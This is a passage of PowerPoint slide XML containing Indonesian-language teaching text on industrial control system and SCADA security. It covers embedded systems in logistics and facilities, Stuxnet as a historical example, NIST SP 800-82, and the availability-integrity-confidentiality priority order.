            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertanam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengendalikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengangkutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengangkatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelacakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Fasilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bangunan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoperasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemanas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ventilasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendingin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>udara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (HVAC), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencahayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>ICS / SCADA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>historis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibangun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperhatikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesadaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlunya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menegakkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindunginya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beroperasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>terkenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tertanam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> worm Stuxnet (wired.com/2014/11/countdown-to-zero-day-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>stuxnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>). Worm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> SCADA yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> pada PC Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>merusak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sentrifugal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> oleh program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bakar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>nuklir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> Iran. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Publikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> NIST 800-82 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>rekomendasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> ICS dan SCADA (nvlpubs.nist.gov/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>nistpubs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>SpecialPublications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>/NIST.SP.800-82r2.pdf).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prioritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seringkali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>elektromekanis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keselamatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prioritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membalikkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> triad CIA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> triad AIC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Industri (ICS) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengawasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Akuisisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Data (SCADA). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem-sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
